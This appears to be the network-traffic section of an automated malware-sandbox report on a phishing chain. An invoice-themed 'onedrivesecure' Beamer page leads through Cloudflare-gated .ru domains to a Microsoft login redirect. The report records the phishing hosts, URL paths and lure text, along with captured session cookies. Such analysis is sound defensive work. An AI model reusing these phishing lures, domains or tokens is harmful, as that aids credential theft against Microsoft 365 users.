Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/egw9b/0x4AAAAAAA3OmVPC4MkMilKk/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wxxi.deripaud.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beamer&utm_medium=standalone&utm_campaign=Stillwell-Hansen-Thermal-Parts&utm_content=textlinkAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImErSmh4VXM5ZEhxalhDc0pVNGdJWXc9PSIsInZhbHVlIjoieGJFM3hYdGZBdWVWVTNMOG5HL0xPSVN0RFlXc2c5d1RHcE5vSWoyUXM1TFRuWUQ2UlhkczZlRDBYK2U3RktEcWZ2OHYrQ3E1ZHJkWkUzY0RsTk02UVdsK0ZLS09vRnNJMityazl5MW96bWlTSm5qSmQvK3A0eldCWmVTN3BDZ0wiLCJtYWMiOiI2YzhkZjFmNjM2MTgyMGM1MDBhNzA4MTQ5Mzc5ZjkwYjUzNWRlNjU3M2U0NGFiMzE5OWYwZGFhNGYyNmE1NjIyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IllGQVhmYzA0NTg0cW9meDFNdXlpS2c9PSIsInZhbHVlIjoiZzI0bVZkWlBDckg1S2h2Q2R0NUZXejQ5UnRJcHh1Q3RrVFpvV1R3K3M4Y0dWakpybHBvdUwyaGZpazRYNThlMVlYRUtiK3RZSlFUNnVnbjhuRUlCeHg5QmMyVTBycURlNitpWEFoTXdyZVdFaFNMVWtRWHFScHEvU21uRERudEoiLCJtYWMiOiI0MTlmNTJjZWJiNDk3MTVmYmRmNjEzZmUyNmVlMjgyODVkNjEyYzU2Y2Q5ZWQxYTE2MDgyNDg5NTA4NjVkMzIzIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=905a5214bea60fa5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/229508354:1737490429:Koj-nizuNayRNyfA2yiEx8JST4io9cxaGRsaFHqDhSU/905a5214bea60fa5/yno75hc7ItL03mdzF.tdrLCRaSSaRBvkkp6oEur_Y6g-1737494137-1.1.1.1-btbtN8gD8ICAgPFeu4Fponn3fU5U0mC0tbaABOQBq6NuAlYKOrS2pg5YZvMa87j6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/905a5214bea60fa5/1737494138717/6bf0541b43570ad3980441987416a5ee4bb620a11eb8073a15fc09826493ef9e/l1Jl6s5G5VT2_AK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/egw9b/0x4AAAAAAA3OmVPC4MkMilKk/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/905a5214bea60fa5/1737494138722/9f3y4b8VlM8-_kF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/egw9b/0x4AAAAAAA3OmVPC4MkMilKk/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/905a5214bea60fa5/1737494138722/9f3y4b8VlM8-_kF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/229508354:1737490429:Koj-nizuNayRNyfA2yiEx8JST4io9cxaGRsaFHqDhSU/905a5214bea60fa5/yno75hc7ItL03mdzF.tdrLCRaSSaRBvkkp6oEur_Y6g-1737494137-1.1.1.1-btbtN8gD8ICAgPFeu4Fponn3fU5U0mC0tbaABOQBq6NuAlYKOrS2pg5YZvMa87j6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/229508354:1737490429:Koj-nizuNayRNyfA2yiEx8JST4io9cxaGRsaFHqDhSU/905a5214bea60fa5/yno75hc7ItL03mdzF.tdrLCRaSSaRBvkkp6oEur_Y6g-1737494137-1.1.1.1-btbtN8gD8ICAgPFeu4Fponn3fU5U0mC0tbaABOQBq6NuAlYKOrS2pg5YZvMa87j6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jlbzlotbmpcuyqcqkqspwLmyrpiRYUVCXKKIKYORDVCPXIACJHOKP HTTP/1.1Host: 7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wxxi.deripaud.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jlbzlotbmpcuyqcqkqspwLmyrpiRYUVCXKKIKYORDVCPXIACJHOKP HTTP/1.1Host: 7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: www.office.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1Host: login.microsoftonline.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fpc=Aox5wiiYoEFJp-jrNCMwzz8; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE3Gu7J1YnGuCT21biePcMX_SdUBxNnEHYKOvqfaEvZx7T5INvrfpuXbdw15orjLcKYWPajjNZ5ClWOiXq9ZmaUKXINS4bBJrV1sZukEpDhdUXm66-n093h-Q6vAR40z2Jffv4ohFX9pD6IHqaqzkxpen7KfNm46S7jVnWyXFEnckgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fpc=Aox5wiiYoEFJp-jrNCMwzz8; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE3Gu7J1YnGuCT21biePcMX_SdUBxNnEHYKOvqfaEvZx7T5INvrfpuXbdw15orjLcKYWPajjNZ5ClWOiXq9ZmaUKXINS4bBJrV1sZukEpDhdUXm66-n093h-Q6vAR40z2Jffv4ohFX9pD6IHqaqzkxpen7KfNm46S7jVnWyXFEnckgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-x7MXOaCbiPM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEeWXp9AWWJ6NjvVb1LrHYDjEKSJqzGdLoOZZiZ6asRvf5OpGrg0pn2wkF0fxJwp7rS012U_NPQk2vjVLPDrjscLNrvAZ_fLins-xrNtnLf69TZG0gean8NFKGcHiIcUfWi3qtHspdDYzyOTVrzyWp9iAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fpc=Aox5wiiYoEFJp-jrNCMwzz8; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE3Gu7J1YnGuCT21biePcMX_SdUBxNnEHYKOvqfaEvZx7T5INvrfpuXbdw15orjLcKYWPajjNZ5ClWOiXq9ZmaUKXINS4bBJrV1sZukEpDhdUXm66-n093h-Q6vAR40z2Jffv4ohFX9pD6IHqaqzkxpen7KfNm46S7jVnWyXFEnckgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-x7MXOaCbiPM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEeWXp9AWWJ6NjvVb1LrHYDjEKSJqzGdLoOZZiZ6asRvf5OpGrg0pn2wkF0fxJwp7rS012U_NPQk2vjVLPDrjscLNrvAZ_fLins-xrNtnLf69TZG0gean8NFKGcHiIcUfWi3qtHspdDYzyOTVrzyWp9iAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
Source: chromecache_146.2.drString found in binary or memory: <li><a target="_blank" href="https://www.facebook.com/dialog/share?app_id=213351392791601&amp;display=page&amp;href=https%3A%2F%2Fapp.getbeamer.com%2Fonedrivesecure%2Fen%2Fstillwell-hansen-thermal-parts-idIm9vr6" class="shareLink" data-social="facebook">Facebook</a></li> equals www.facebook.com (Facebook)
Source: chromecache_146.2.drString found in binary or memory: <li><a target="_blank" href="https://www.linkedin.com/shareArticle?source=Beamer&amp;mini=true&amp;title=Stillwell+Hansen+Thermal+Parts+&amp;summary=Document Name: 930WICO-JAN-INV 01938 equals www.linkedin.com (Linkedin)
Source: global trafficDNS traffic detected: DNS query: app.getbeamer.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: wxxi.deripaud.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /loadMoreNews?app_id=yCPizuyh73191&language=EN&user_id=876d4375-575e-495b-ac98-b2829ba9249f&publicPage=true&post=false&basePath=https%3A%2F%2Fapp.getbeamer.com%2Fonedrivesecure%2Fen HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveContent-Length: 48sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://app.getbeamer.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 21:15:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gV93%2FFUHZT68U4A6EOJVhQX6Xa8X%2BEzfCFEzZuMV%2BOkT8tSJogm8lxr10R6QfZjl35GPJPaDghJhxsRvioqPTIwksRHx%2Bvy6pYqJOsoJBf1U35xnHfFOstLy1ONdWQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5480&min_rtt=5434&rtt_var=1618&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2260&delivery_rate=494358&cwnd=251&unsent_bytes=0&cid=3e833d3f5810e5f6&ts=160&x=0"CF-Cache-Status: HITAge: 4862Server: cloudflareCF-RAY: 905a521be8d3bdb4-DUBserver-timing: cfL4;desc="?proto=TCP&rtt=92819&min_rtt=92807&rtt_var=34811&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2003&delivery_rate=31463&cwnd=32&unsent_bytes=0&cid=2306f470d54f8600&ts=4665&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: ad84d08a-0d6b-4c74-8a0d-1f31f0cb0200x-ms-ests-server: 2.1.19899.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-UPy0i7gdrXEVGuqIkKEcWA' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllX-XSS-Protection: 0Date: Tue, 21 Jan 2025 21:15:50 GMTConnection: closeContent-Length: 0
Source: chromecache_123.2.drString found in binary or memory: http://www.getbeamer.com
Source: chromecache_123.2.drString found in binary or memory: http://www.joincube.com
Source: chromecache_146.2.drString found in binary or memory: https://api.whatsapp.com/send?text=https%3A%2F%2Fapp.getbeamer.com%2Fonedrivesecure%2Fen%2Fstillwell
Source: chromecache_133.2.dr, chromecache_107.2.drString found in binary or memory: https://app.getbeamer.com
Source: chromecache_133.2.dr, chromecache_107.2.drString found in binary or memory: https://app.getbeamer.com/
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts/material-icons.eot
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts/material-icons.ttf
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts/material-icons.woff
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts/material-icons.woff2
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Bold.eot
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Bold.svg
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Bold.ttf
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Bold.woff
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Bold.woff2
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Normal-300a.woff2)
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Normal-300b.woff2)
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Normal-400a.woff2)
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Normal-400b.woff2)
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Normal-700a.woff2)
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Normal-700b.woff2)
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Regular.eot
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Regular.svg
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Regular.ttf
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Regular.woff
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/fonts2/Lato-Regular.woff2
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/beamerIso.png
